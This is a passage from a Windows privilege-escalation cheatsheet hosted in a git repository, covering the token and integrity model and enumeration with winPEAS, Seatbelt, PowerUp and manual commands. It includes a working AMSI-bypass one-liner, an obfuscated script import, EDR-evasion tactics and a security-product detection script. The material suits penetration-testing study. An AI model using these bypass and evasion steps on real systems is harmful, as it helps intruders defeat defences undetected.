daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

windows-privesc.md (95715B)


      1 ---
      2 title: "Windows Privilege Escalation"
      3 description: "Windows privesc master guide: token/privilege abuse, services, registry, AlwaysInstallElevated, potatoes."
      4 category: privilege-escalation
      5 tags: [privilege-escalation, windows, post-exploitation]
      6 tools: [winPEAS, PowerUp, JuicyPotato]
      7 difficulty: advanced
      8 updated: "2026-09-17"
      9 source: "vault:PrivEsc/PrivEsc - Windows.md"
     10 ---
     11 
     12 # Windows Privilege Escalation Master Guide (2026 Edition)
     13 
     14 
     15 
     16 ---
     17 #WindowsPrivilegeEscalation #Privileges #PrivilegeEscalation 
     18 ## Table of Contents
     19 
     20 1. [Introduction & Philosophy](#i-introduction--philosophy)
     21 2. [Enumeration (The Foundation)](#ii-enumeration-the-foundation)
     22 3. [Configuration & Service Exploits](#iii-configuration--service-exploits)
     23 4. [Credential Harvesting & Secrets](#iv-credential-harvesting--secrets)
     24 5. [Kernel & OS Vulnerabilities](#v-kernel--os-vulnerabilities)
     25 6. [Token Manipulation & Potato Attacks](#vi-token-manipulation--potato-attacks)
     26 7. [Defense & OPSEC](#vii-defense--opsec)
     27 8. [The Ultimate Cheat Sheet](#viii-the-ultimate-cheat-sheet)
     28 9. [2026 Addendum: Modern Attack Surface](#ix-2026-addendum-modern-attack-surface)
     29 
     30 ---
     31 
     32 # I. Introduction & Philosophy
     33 
     34 ## 1.1 The Windows Privilege Model
     35 
     36 Windows employs a multi-layered security architecture built around three core concepts: **Security Identifiers (SIDs)**, **Access Tokens**, and **Integrity Levels**. Understanding these fundamentals is essential before attempting any privilege escalation technique.
     37 
     38 ### 1.1.1 Security Identifiers (SIDs)
     39 
     40 Every security principal in Windows—users, groups, computers, and services—receives a unique Security Identifier (SID) that persists for the lifetime of that principal. SIDs are the foundation of Windows access control.
     41 
     42 **SID Structure:**
     43 ```
     44 S-R-X-Y1-Y2-...-Yn-RID
     45 ```
     46 
     47 | Component | Description | Example |
     48 |-----------|-------------|---------|
     49 | S | Literal prefix indicating SID | S |
     50 | R | Revision level (always 1) | 1 |
     51 | X | Identifier Authority | 5 (NT Authority) |
     52 | Y1-Yn | Subauthority values | 21-3623811015-3361044348-30300820 |
     53 | RID | Relative Identifier | 1013 |
     54 
     55 **Well-Known SIDs Critical for PrivEsc:**
     56 
     57 | SID | Name | Significance |
     58 |-----|------|--------------|
     59 | S-1-5-18 | NT AUTHORITY\SYSTEM | Highest privilege local account |
     60 | S-1-5-19 | NT AUTHORITY\LOCAL SERVICE | Reduced privilege service account |
     61 | S-1-5-20 | NT AUTHORITY\NETWORK SERVICE | Network-facing service account |
     62 | S-1-5-32-544 | BUILTIN\Administrators | Local admin group |
     63 | S-1-5-32-551 | BUILTIN\Backup Operators | Can bypass file ACLs |
     64 | S-1-5-32-548 | BUILTIN\Account Operators | Can modify non-protected users |
     65 | S-1-5-32-549 | BUILTIN\Server Operators | Can modify services on DCs |
     66 | S-1-5-32-550 | BUILTIN\Print Operators | Can load drivers on DCs |
     67 | S-1-1-0 | Everyone | All authenticated users |
     68 | S-1-5-11 | Authenticated Users | Domain-authenticated users |
     69 
     70 ### 1.1.2 Access Tokens
     71 
     72 When a user authenticates to Windows, the Local Security Authority Subsystem Service (LSASS) creates an **access token** containing:
     73 
     74 - User SID
     75 - Group SIDs (all groups the user belongs to)
     76 - Privilege list (user rights)
     77 - Integrity level
     78 - Session ID
     79 - Token type (Primary or Impersonation)
     80 
     81 **Token Types:**
     82 
     83 | Type | Description | PrivEsc Relevance |
     84 |------|-------------|-------------------|
     85 | Primary Token | Attached to processes, represents security context | Target for token stealing |
     86 | Impersonation Token | Used by threads to act on behalf of another user | Potato attacks exploit these |
     87 | Delegation Token | Extended impersonation for multi-hop authentication | Kerberos double-hop scenarios |
     88 
     89 **Impersonation Levels:**
     90 
     91 | Level | Description | Exploitability |
     92 |-------|-------------|----------------|
     93 | Anonymous | No identification | Cannot impersonate |
     94 | Identification | Can identify but not impersonate | Limited use |
     95 | Impersonation | Can impersonate on local system | Primary target for Potato attacks |
     96 | Delegation | Can impersonate across network | Most powerful, enables lateral movement |
     97 
     98 ### 1.1.3 Integrity Levels
     99 
    100 Windows Vista introduced Mandatory Integrity Control (MIC), adding a hierarchical trust layer:
    101 
    102 | Level | Value | Description | Examples |
    103 |-------|-------|-------------|----------|
    104 | Untrusted | 0x0000 | Processes with restricted tokens | Sandboxed processes |
    105 | Low | 0x1000 | Internet-facing applications | Protected Mode IE, Edge |
    106 | Medium | 0x2000 | Standard user processes | Most user applications |
    107 | High | 0x3000 | Elevated/Administrator processes | Admin cmd.exe |
    108 | System | 0x4000 | Operating system processes | Services, SYSTEM processes |
    109 | Protected Process | 0x5000 | Anti-malware and DRM | Windows Defender, LSASS (PPL) |
    110 
    111 **Integrity Level Verification:**
    112 ```powershell
    113 whoami /groups | findstr "Mandatory"
    114 ```
    115 
    116 Output interpretation:
    117 ```
    118 Mandatory Label\Medium Mandatory Level    Label    S-1-16-8192
    119 ```
    120 - `S-1-16-4096` = Low Integrity
    121 - `S-1-16-8192` = Medium Integrity  
    122 - `S-1-16-12288` = High Integrity
    123 - `S-1-16-16384` = System Integrity
    124 
    125 ### 1.1.4 The Windows Authorization Process
    126 
    127 When a subject (user/process) attempts to access an object (file/service/registry key):
    128 
    129 1. **Token Presentation**: Process presents its access token
    130 2. **Security Descriptor Retrieval**: System retrieves object's security descriptor containing:
    131    - Owner SID
    132    - Group SID
    133    - DACL (Discretionary Access Control List)
    134    - SACL (System Access Control List)
    135 3. **ACE Evaluation**: System evaluates Access Control Entries in order:
    136    - Explicit Deny ACEs evaluated first
    137    - Explicit Allow ACEs evaluated second
    138    - Inherited Deny ACEs third
    139    - Inherited Allow ACEs last
    140 4. **Access Decision**: Grant or deny based on cumulative permissions
    141 
    142 **Critical Insight**: This process happens instantaneously for every resource access attempt. Attackers exploit this by:
    143 - Manipulating tokens (impersonation attacks)
    144 - Modifying security descriptors (weak permissions)
    145 - Inserting themselves into the authorization process (service hijacking)
    146 
    147 ## 1.2 Living off the Land (LotL) Philosophy in 2025
    148 
    149 Modern Windows environments deploy sophisticated endpoint detection capabilities—Windows 11 24H2 and Server 2025 include Microsoft Defender for Endpoint with advanced behavioral detection, AMSI integration across PowerShell/VBScript/JavaScript, and Credential Guard protection. Traditional attack tools trigger immediate alerts.
    150 
    151 ### 1.2.1 The LotL Imperative
    152 
    153 Living off the Land Binaries (LOLBins) are Microsoft-signed executables that:
    154 - Bypass application whitelisting (AppLocker, WDAC)
    155 - Avoid signature-based detection
    156 - Blend with legitimate system activity
    157 - Provide plausible deniability
    158 
    159 **2025 LOLBin Categories for PrivEsc:**
    160 
    161 | Category | Examples | Use Case |
    162 |----------|----------|----------|
    163 | File Transfer | certutil, bitsadmin, curl.exe | Tool staging |
    164 | Execution | rundll32, regsvr32, mshta, wmic | Payload execution |
    165 | Compilation | csc.exe, msbuild.exe | On-target compilation |
    166 | Service Manipulation | sc.exe, reg.exe | Service attacks |
    167 | Credential Access | cmdkey, vaultcmd | Credential harvesting |
    168 
    169 ### 1.2.2 The 2025 Detection Landscape
    170 
    171 **Current EDR Capabilities to Evade:**
    172 
    173 | Technology | What It Detects | Evasion Strategy |
    174 |------------|-----------------|------------------|
    175 | ETW (Event Tracing for Windows) | Process creation, API calls, network | ETW patching, indirect syscalls |
    176 | AMSI (Antimalware Scan Interface) | PowerShell, VBScript, JavaScript content | AMSI bypass, obfuscation |
    177 | Kernel Callbacks | Driver loading, process/thread creation | Callback removal (requires kernel access) |
    178 | Credential Guard | LSASS credential dumping | Target non-protected credentials |
    179 | Protected Process Light (PPL) | LSASS process access | Bypass via vulnerable drivers |
    180 | Smart App Control (SAC) | Reputation-based blocking | Use signed binaries, trusted publishers |
    181 
    182 **Modern OPSEC Principles:**
    183 
    184 1. **Minimize footprint**: Use built-in tools wherever possible
    185 2. **Blend with noise**: Execute during normal business hours
    186 3. **Avoid known-bad indicators**: Don't use default tool parameters/filenames
    187 4. **Chain techniques**: Combine multiple weak findings into escalation path
    188 5. **Test detection**: Use Defender-enabled systems during development
    189 
    190 ### 1.2.3 Primary Privilege Escalation Targets
    191 
    192 | Target Account | Description | Priority |
    193 |----------------|-------------|----------|
    194 | NT AUTHORITY\SYSTEM | LocalSystem account—more privileges than local admin | Highest |
    195 | BUILTIN\Administrators | Local administrator group membership | High |
    196 | Domain Admins | Domain-wide administrative access | Critical (if domain-joined) |
    197 | Specific Service Accounts | May have elevated privileges for specific tasks | Situational |
    198 
    199 **Escalation Philosophy:**
    200 1. Always enumerate first—understand your current context
    201 2. Identify the shortest path to your target privilege level
    202 3. Have backup techniques prepared
    203 4. Document every step for client reporting
    204 5. Consider operational impact before executing
    205 
    206 ---
    207 
    208 # II. Enumeration (The Foundation)
    209 
    210 ## 2.1 Automated Tools Deep Dive
    211 
    212 Automated enumeration tools rapidly identify privilege escalation vectors but generate significant noise. Understanding each tool's capabilities, limitations, and detection footprint is essential for operational success.
    213 
    214 ### 2.1.1 Tool Comparison Matrix
    215 
    216 | Tool | Language | Purpose | OPSEC Rating | Detection Risk | Best For |
    217 |------|----------|---------|--------------|----------------|----------|
    218 | WinPEAS | C#/Batch | Comprehensive enumeration | ⚠️ Low | High (flagged by most AV) | Lab environments, thorough analysis |
    219 | Seatbelt | C# | Security-focused enumeration | ⚠️ Medium | Medium-High | Targeted checks, modular execution |
    220 | SharpUp | C# | PowerUp port to C# | ⚠️ Medium | Medium | .NET environments, compiled execution |
    221 | PowerUp | PowerShell | Service/registry misconfig | ⚠️ Low | High (AMSI) | Quick assessment, script execution |
    222 | PrivescCheck | PowerShell | Modern Windows checks | ⚠️ Medium | Medium (AMSI bypass options) | Windows 10/11, Server 2019+ |
    223 | JAWS | PowerShell | PS 2.0 compatible | ✅ Higher | Lower (legacy systems) | Older systems, PS 2.0 environments |
    224 | Watson | C# | Kernel exploit suggester | ⚠️ Medium | Medium | Patch level analysis |
    225 | Sherlock | PowerShell | Legacy exploit suggester | ❌ Obsolete | High | Legacy (Windows 7/2008 R2) |
    226 | BeRoot | Python | Multi-platform privesc | ⚠️ Medium | Medium | Cross-platform assessments |
    227 
    228 ### 2.1.2 WinPEAS Deep Dive
    229 
    230 WinPEAS is the most comprehensive Windows privilege escalation enumeration tool, performing hundreds of checks across system configuration, services, applications, and credentials.
    231 
    232 **Execution Methods:**
    233 
    234 ```batch
    235 :: Basic execution
    236 winpeasx64.exe
    237 
    238 :: Quiet mode (reduced output)
    239 winpeasx64.exe quiet
    240 
    241 :: Fast mode (skip slow checks)
    242 winpeasx64.exe fast
    243 
    244 :: Specific checks only
    245 winpeasx64.exe servicesinfo
    246 
    247 :: Log output to file
    248 winpeasx64.exe log=C:\temp\winpeas.txt
    249 
    250 :: No color (for logging)
    251 winpeasx64.exe notcolor
    252 ```
    253 
    254 **WinPEAS Check Categories:**
    255 
    256 | Category | What It Checks | PrivEsc Relevance |
    257 |----------|----------------|-------------------|
    258 | System Information | OS version, hotfixes, AV status | Kernel exploits, missing patches |
    259 | Users Information | User privileges, groups, sessions | Token privileges, group abuse |
    260 | Processes Information | Running processes, DLLs | DLL hijacking, process injection |
    261 | Services Information | Service permissions, paths | Unquoted paths, weak permissions |
    262 | Applications Information | Installed software, startup | Application-specific vulns |
    263 | Network Information | Interfaces, listening ports | Internal services, port forwarding |
    264 | Windows Credentials | Stored credentials, SAM access | Direct credential theft |
    265 | Browser Information | Saved passwords, history | Credential harvesting |
    266 | Interesting Files | Config files, scripts, keys | Credential discovery |
    267 
    268 **WinPEAS OPSEC Considerations:**
    269 
    270 - **Detection**: Flagged by 50+ AV engines; Windows Defender blocks by default
    271 - **Mitigation**: Compile from source with obfuscation, or use module-by-module approach
    272 - **Alternative**: Run individual checks manually using equivalent commands
    273 
    274 ### 2.1.3 Seatbelt Deep Dive
    275 
    276 Seatbelt performs targeted security checks with modular execution capability, making it more suitable for operational environments.
    277 
    278 **Execution Methods:**
    279 
    280 ```powershell
    281 # Run all checks
    282 .\Seatbelt.exe -group=all
    283 
    284 # Run specific command groups
    285 .\Seatbelt.exe -group=system
    286 .\Seatbelt.exe -group=user
    287 .\Seatbelt.exe -group=misc
    288 
    289 # Run specific commands
    290 .\Seatbelt.exe TokenPrivileges
    291 .\Seatbelt.exe WindowsCredentialFiles
    292 .\Seatbelt.exe CredEnum
    293 
    294 # Remote execution (requires admin on remote host)
    295 .\Seatbelt.exe -group=remote -computername=DC01.corp.local
    296 ```
    297 
    298 **Key Seatbelt Commands for PrivEsc:**
    299 
    300 | Command | Description | Priority |
    301 |---------|-------------|----------|
    302 | `TokenPrivileges` | Current token privileges | Critical |
    303 | `WindowsCredentialFiles` | Credential Manager files | High |
    304 | `CredEnum` | Enumerate stored credentials | High |
    305 | `InterestingProcesses` | Security-relevant processes | Medium |
    306 | `LocalGroups` | Local group membership | High |
    307 | `MappedDrives` | Network drives (may have creds) | Medium |
    308 | `PowerShellHistory` | PS command history | High |
    309 | `PuttyHostKeys` | Saved SSH servers | Medium |
    310 | `SlackDownloads` | Slack file downloads | Low |
    311 | `TokenGroups` | All group memberships | Critical |
    312 
    313 ### 2.1.4 SharpUp Deep Dive
    314 
    315 SharpUp is a C# port of PowerUp, providing the same service/registry misconfiguration checks in a compiled format that bypasses AMSI.
    316 
    317 **Execution:**
    318 
    319 ```powershell
    320 # Full audit
    321 .\SharpUp.exe audit
    322 
    323 # Check specific vulnerabilities
    324 .\SharpUp.exe HijackablePaths
    325 .\SharpUp.exe ModifiableServiceBinaries
    326 .\SharpUp.exe ModifiableServices
    327 .\SharpUp.exe UnquotedServicePath
    328 ```
    329 
    330 **SharpUp Check Categories:**
    331 
    332 | Check | Description | Exploitation Path |
    333 |-------|-------------|-------------------|
    334 | `AlwaysInstallElevated` | MSI packages install as SYSTEM | Malicious MSI installation |
    335 | `CachedGPPPassword` | Group Policy Preferences passwords | Direct credential recovery |
    336 | `HijackablePaths` | Writable PATH directories | DLL hijacking |
    337 | `McAfeeSitelistFiles` | McAfee credential files | Credential extraction |
    338 | `ModifiableScheduledTasks` | Writable scheduled task binaries | Binary replacement |
    339 | `ModifiableServiceBinaries` | Writable service executables | Binary replacement |
    340 | `ModifiableServiceRegistryKeys` | Writable service registry keys | ImagePath modification |
    341 | `ModifiableServices` | Services with weak DACLs | Service reconfiguration |
    342 | `ProcessDLLHijack` | Running processes vulnerable to DLL hijack | DLL injection |
    343 | `RegistryAutoLogon` | Autologon credentials in registry | Credential recovery |
    344 | `RegistryAutoRuns` | Writable autorun locations | Persistence/escalation |
    345 | `UnattendedInstallFiles` | Unattend.xml with credentials | Credential recovery |
    346 | `UnquotedServicePath` | Unquoted service paths with spaces | Binary planting |
    347 
    348 ### 2.1.5 PowerUp Deep Dive
    349 
    350 PowerUp remains the most widely-used PowerShell privilege escalation framework despite AMSI challenges.
    351 
    352 **Execution Methods:**
    353 
    354 ```powershell
    355 # Import the module
    356 Import-Module .\PowerUp.ps1
    357 
    358 # Run all checks
    359 Invoke-AllChecks
    360 
    361 # Run all checks and export to HTML
    362 Invoke-AllChecks -HTMLReport
    363 
    364 # Individual function execution
    365 Get-UnquotedService
    366 Get-ModifiableServiceFile
    367 Get-ModifiableService
    368 Get-ServiceDetail -Name "VulnerableService"
    369 ```
    370 
    371 **AMSI Bypass for PowerUp (2025):**
    372 
    373 ```powershell
    374 # Method 1: Reflection-based bypass
    375 $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf=@(0);[System.Runtime.InteropServices.Marshal]::Copy($buf,0,$ptr,1)
    376 
    377 # Method 2: PowerShell downgrade (if PS 2.0 available)
    378 powershell.exe -version 2 -ep bypass -file PowerUp.ps1
    379 
    380 # Method 3: Obfuscated import
    381 $code = [System.IO.File]::ReadAllText("C:\temp\PowerUp.ps1")
    382 $code = $code -replace 'Invoke-AllChecks', 'Invoke-AC'
    383 IEX $code
    384 Invoke-AC
    385 ```
    386 
    387 **Key PowerUp Functions:**
    388 
    389 | Function | Purpose | Auto-Exploit Available |
    390 |----------|---------|------------------------|
    391 | `Get-UnquotedService` | Find unquoted service paths | `Write-ServiceBinary` |
    392 | `Get-ModifiableServiceFile` | Find writable service binaries | `Install-ServiceBinary` |
    393 | `Get-ModifiableService` | Find services with weak DACLs | `Invoke-ServiceAbuse` |
    394 | `Get-RegistryAlwaysInstallElevated` | Check AlwaysInstallElevated | `Write-UserAddMSI` |
    395 | `Get-RegistryAutoLogon` | Check for autologon creds | N/A |
    396 | `Get-CachedGPPPassword` | Find cached GPP passwords | N/A |
    397 | `Get-UnattendedInstallFile` | Find unattend.xml files | N/A |
    398 | `Get-ModifiableRegistryAutoRun` | Find writable autorun keys | N/A |
    399 | `Get-PathDLLHijack` | Find PATH DLL hijacking | `Write-HijackDll` |
    400 
    401 ### 2.1.6 PrivescCheck Deep Dive
    402 
    403 PrivescCheck is a modern PowerShell script designed for Windows 10/11 and Server 2019/2022/2025, with built-in AMSI evasion options.
    404 
    405 **Execution Methods:**
    406 
    407 ```powershell
    408 # Basic execution
    409 .\PrivescCheck.ps1
    410 
    411 # Extended mode (more checks)
    412 .\PrivescCheck.ps1 -Extended
    413 
    414 # Specific category
    415 .\PrivescCheck.ps1 -Extended -Category "Services"
    416 
    417 # Export results
    418 .\PrivescCheck.ps1 -Extended -Report PrivescCheck_Results -Format HTML,CSV
    419 
    420 # Audit mode (minimal changes)
    421 .\PrivescCheck.ps1 -Audit
    422 ```
    423 
    424 **PrivescCheck Categories:**
    425 
    426 | Category | Checks Performed |
    427 |----------|------------------|
    428 | User | Current user, privileges, groups, environment |
    429 | Services | Service permissions, unquoted paths, registry |
    430 | Scheduled Tasks | Task permissions, binary paths |
    431 | Applications | Installed apps, startup programs |
    432 | Credentials | Stored credentials, cached passwords |
    433 | Hardening | Security features status (UAC, LSA, etc.) |
    434 | Configuration | System configuration weaknesses |
    435 | Network | Listening services, firewall rules |
    436 
    437 ## 2.2 Manual Enumeration Methodology
    438 
    439 Automated tools are essential but understanding manual enumeration is critical when:
    440 - Tools are detected/blocked by EDR
    441 - Limited write access prevents tool upload
    442 - Stealth is paramount
    443 - Verifying automated tool findings
    444 
    445 ### 2.2.1 System Information Gathering
    446 
    447 ```batch
    448 :: Basic system information
    449 systeminfo
    450 
    451 :: Hostname and domain
    452 hostname
    453 echo %USERDOMAIN%
    454 
    455 :: OS version (registry method - more reliable)
    456 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
    457 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CurrentBuild
    458 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId
    459 
    460 :: Architecture
    461 wmic os get osarchitecture
    462 echo %PROCESSOR_ARCHITECTURE%
    463 
    464 :: Environment variables
    465 set
    466 
    467 :: System uptime (for patch assessment)
    468 net statistics server | findstr "Statistics since"
    469 ```
    470 
    471 ```powershell
    472 # PowerShell system enumeration
    473 [System.Environment]::OSVersion.Version
    474 Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer
    475 Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version, BuildNumber, OSArchitecture
    476 ```
    477 
    478 ### 2.2.2 Patch Level Enumeration
    479 
    480 Understanding patch level is critical for kernel exploit selection.
    481 
    482 ```batch
    483 :: List installed hotfixes (CMD)
    484 wmic qfe list brief
    485 
    486 :: Filter for security updates
    487 wmic qfe list brief | findstr /i "security"
    488 
    489 :: Specific KB search
    490 wmic qfe | findstr "KB5034441"
    491 ```
    492 
    493 ```powershell
    494 # PowerShell hotfix enumeration
    495 Get-HotFix | Select-Object HotFixID, Description, InstalledOn | Sort-Object InstalledOn -Descending
    496 
    497 # Check for specific critical patches
    498 $criticalKBs = @("KB5034441", "KB5031356", "KB5028185")
    499 $installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
    500 foreach ($kb in $criticalKBs) {
    501     if ($installed -contains $kb) {
    502         Write-Host "[+] $kb is installed" -ForegroundColor Green
    503     } else {
    504         Write-Host "[-] $kb is MISSING" -ForegroundColor Red
    505     }
    506 }
    507 
    508 # Last update check
    509 (Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 1).InstalledOn
    510 ```
    511 
    512 **Critical Missing Patch Indicators:**
    513 
    514 | Scenario | Implication |
    515 |----------|-------------|
    516 | No patches in 6+ months | Likely vulnerable to multiple kernel exploits |
    517 | Missing servicing stack updates | May have known privilege escalation vulns |
    518 | Defender definitions outdated | AV may be disabled |
    519 
    520 ### 2.2.3 User and Group Enumeration
    521 
    522 ```batch
    523 :: Current user context
    524 whoami
    525 echo %USERNAME%
    526 
    527 :: Current user privileges (CRITICAL)
    528 whoami /priv
    529 
    530 :: Current user group membership
    531 whoami /groups
    532 
    533 :: All information about current user
    534 whoami /all
    535 
    536 :: List all local users
    537 net user
    538 
    539 :: Specific user details
    540 net user Administrator
    541 net user %USERNAME%
    542 
    543 :: List all local groups
    544 net localgroup
    545 
    546 :: Members of specific groups
    547 net localgroup Administrators
    548 net localgroup "Remote Desktop Users"
    549 net localgroup "Backup Operators"
    550 
    551 :: Password policy
    552 net accounts
    553 ```
    554 
    555 ```powershell
    556 # Get current user privileges with state
    557 whoami /priv | Select-String "Se"
    558 
    559 # Enumerate local admins
    560 Get-LocalGroupMember -Group "Administrators" | Select-Object Name, PrincipalSource
    561 
    562 # Check specific group memberships
    563 $groups = @("Administrators", "Backup Operators", "Remote Desktop Users", "Remote Management Users")
    564 foreach ($group in $groups) {
    565     Write-Host "`n[*] Members of $group :" -ForegroundColor Cyan
    566     Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue | ForEach-Object { Write-Host "    $($_.Name)" }
    567 }
    568 
    569 # Get user description (sometimes contains passwords!)
    570 Get-LocalUser | Select-Object Name, Enabled, Description
    571 ```
    572 
    573 **Privilege Escalation Priority Privileges:**
    574 
    575 | Privilege | State | Exploitation Path |
    576 |-----------|-------|-------------------|
    577 | SeImpersonatePrivilege | Enabled | Potato attacks (GodPotato, PrintSpoofer) |
    578 | SeAssignPrimaryTokenPrivilege | Enabled | Potato attacks, token manipulation |
    579 | SeDebugPrivilege | Enabled | LSASS dumping, process injection |
    580 | SeBackupPrivilege | Enabled | SAM/SYSTEM extraction, NTDS.dit theft |
    581 | SeRestorePrivilege | Enabled | DLL hijacking via file replacement |
    582 | SeTakeOwnershipPrivilege | Enabled | Take ownership of any file |
    583 | SeLoadDriverPrivilege | Enabled | Load vulnerable kernel driver |
    584 | SeSecurityPrivilege | Enabled | Manipulate audit logs |
    585 | SeTcbPrivilege | Enabled | Act as part of OS (impersonate anyone) |
    586 
    587 ### 2.2.4 Network Enumeration
    588 
    589 ```batch
    590 :: Interface configuration
    591 ipconfig /all
    592 
    593 :: Routing table
    594 route print
    595 
    596 :: ARP cache (recently communicated hosts)
    597 arp -a
    598 
    599 :: Active connections and listening ports
    600 netstat -ano
    601 
    602 :: Filter for listening ports
    603 netstat -ano | findstr "LISTENING"
    604 
    605 :: Firewall status
    606 netsh advfirewall show allprofiles
    607 
    608 :: Firewall rules
    609 netsh advfirewall firewall show rule name=all
    610 ```
    611 
    612 ```powershell
    613 # PowerShell network enumeration
    614 Get-NetIPConfiguration
    615 Get-NetRoute | Where-Object {$_.NextHop -ne "0.0.0.0"} | Select-Object DestinationPrefix, NextHop, InterfaceAlias
    616 Get-NetTCPConnection -State Listen | Select-Object LocalAddress, LocalPort, OwningProcess | Sort-Object LocalPort
    617 
    618 # Identify process for listening port
    619 $listeners = Get-NetTCPConnection -State Listen
    620 foreach ($listener in $listeners) {
    621     $proc = Get-Process -Id $listener.OwningProcess -ErrorAction SilentlyContinue
    622     Write-Host "$($listener.LocalAddress):$($listener.LocalPort) -> $($proc.ProcessName) (PID: $($listener.OwningProcess))"
    623 }
    624 ```
    625 
    626 **Internal Service Discovery:**
    627 
    628 | Binding | Significance |
    629 |---------|--------------|
    630 | 127.0.0.1:PORT | Localhost-only service (may lack authentication) |
    631 | 0.0.0.0:PORT | Listening on all interfaces |
    632 | 10.x.x.x:PORT | Listening on specific internal interface |
    633 
    634 Common internal services to investigate:
    635 - MySQL (3306), MSSQL (1433), PostgreSQL (5432)
    636 - Splunk (8089), Elasticsearch (9200), Redis (6379)
    637 - Management interfaces (8080, 8443, 9000)
    638 
    639 ### 2.2.5 Running Processes and Services
    640 
    641 ```batch
    642 :: List all running processes with services
    643 tasklist /svc
    644 
    645 :: Detailed process list
    646 tasklist /v
    647 
    648 :: Running services
    649 sc query
    650 
    651 :: Services in specific state
    652 sc query state= all | findstr "SERVICE_NAME STATE" | more
    653 
    654 :: Service details
    655 sc qc "ServiceName"
    656 
    657 :: Service permissions (using sc)
    658 sc sdshow "ServiceName"
    659 ```
    660 
    661 ```powershell
    662 # Processes with user context
    663 Get-Process -IncludeUserName | Select-Object ProcessName, Id, UserName | Sort-Object UserName
    664 
    665 # Services not running as SYSTEM (potentially exploitable)
    666 Get-WmiObject Win32_Service | Where-Object {$_.StartName -notmatch "LocalSystem|LocalService|NetworkService"} | 
    667     Select-Object Name, StartName, PathName, State
    668 
    669 # Services with Auto start
    670 Get-Service | Where-Object {$_.StartType -eq "Automatic" -and $_.Status -eq "Running"} | 
    671     Select-Object Name, DisplayName, Status
    672 
    673 # Identify AV/EDR processes
    674 $avProcesses = @("MsMpEng", "MsSense", "SenseIR", "SenseNdr", "cb", "CylanceSvc", "CSFalconService", "Tanium", "Sysmon", "emet_service")
    675 Get-Process | Where-Object {$avProcesses -contains $_.ProcessName} | Select-Object ProcessName, Id
    676 ```
    677 
    678 ### 2.2.6 AV/EDR Enumeration
    679 
    680 Identifying security products is essential for tool selection and evasion.
    681 
    682 ```powershell
    683 # Windows Defender status
    684 Get-MpComputerStatus | Select-Object RealTimeProtectionEnabled, BehaviorMonitorEnabled, IoavProtectionEnabled, AntivirusEnabled
    685 
    686 # Defender exclusions (if readable)
    687 Get-MpPreference | Select-Object ExclusionPath, ExclusionExtension, ExclusionProcess
    688 
    689 # Security Center products (WMI method)
    690 Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct | Select-Object displayName, productState
    691 Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiSpywareProduct | Select-Object displayName, productState
    692 Get-WmiObject -Namespace "root\SecurityCenter2" -Class FirewallProduct | Select-Object displayName, productState
    693 
    694 # Common AV process detection
    695 $avIndicators = @{
    696     "MsMpEng" = "Windows Defender"
    697     "MsSense" = "Microsoft Defender ATP"
    698     "CSFalconService" = "CrowdStrike Falcon"
    699     "cb" = "Carbon Black"
    700     "CylanceSvc" = "Cylance"
    701     "SentinelAgent" = "SentinelOne"
    702     "Tanium" = "Tanium"
    703     "emet_service" = "EMET"
    704     "Sysmon" = "Sysmon"
    705 }
    706 
    707 foreach ($proc in $avIndicators.Keys) {
    708     if (Get-Process -Name $proc -ErrorAction SilentlyContinue) {
    709         Write-Host "[!] $($avIndicators[$proc]) detected ($proc)" -ForegroundColor Red
    710     }
    711 }
    712 ```
    713 
    714 ### 2.2.7 Installed Software Enumeration
    715 
    716 ```batch
    717 :: WMI method (slow but comprehensive)
    718 wmic product get name,version
    719 
    720 :: Registry method (faster)
    721 reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr /i "DisplayName DisplayVersion"
    722 reg query "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr /i "DisplayName DisplayVersion"
    723 ```
    724 
    725 ```powershell
    726 # Installed programs via registry
    727 $32bit = Get-ItemProperty "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | 
    728     Select-Object DisplayName, DisplayVersion, Publisher
    729 $64bit = Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | 
    730     Select-Object DisplayName, DisplayVersion, Publisher
    731 ($32bit + $64bit) | Where-Object {$_.DisplayName} | Sort-Object DisplayName | Format-Table -AutoSize
    732 ```
    733 
    734 ### 2.2.8 Named Pipes Enumeration
    735 
    736 Named pipes are inter-process communication channels that can be exploited for privilege escalation.
    737 
    738 ```batch
    739 :: List named pipes (Sysinternals)
    740 pipelist.exe /accepteula
    741 
    742 :: Check pipe permissions
    743 accesschk.exe /accepteula -w \\.\pipe\* -v
    744 accesschk.exe /accepteula \\.\pipe\spoolss -v
    745 ```
    746 
    747 ```powershell
    748 # List named pipes (PowerShell)
    749 Get-ChildItem \\.\pipe\ | Select-Object Name
    750 
    751 # Check specific pipe permissions
    752 (Get-Acl \\.\pipe\lsass).Access | Format-Table IdentityReference, FileSystemRights
    753 ```
    754 
    755 ---
    756 
    757 # III. Configuration & Service Exploits
    758 
    759 ## 3.1 Windows Services Exploitation
    760 
    761 Windows services represent one of the most reliable privilege escalation vectors. Services run with specific account privileges (often SYSTEM) and have configuration files, binaries, and registry keys that may be vulnerable to manipulation.
    762 
    763 ### 3.1.1 Understanding Service Architecture
    764 
    765 **Service Accounts and Their Privileges:**
    766 
    767 | Account | Privileges | Network Access | PrivEsc Value |
    768 |---------|-----------|----------------|---------------|
    769 | LocalSystem (SYSTEM) | Full system access | Machine account credentials | Highest |
    770 | LocalService | Limited local access | Anonymous network access | Medium |
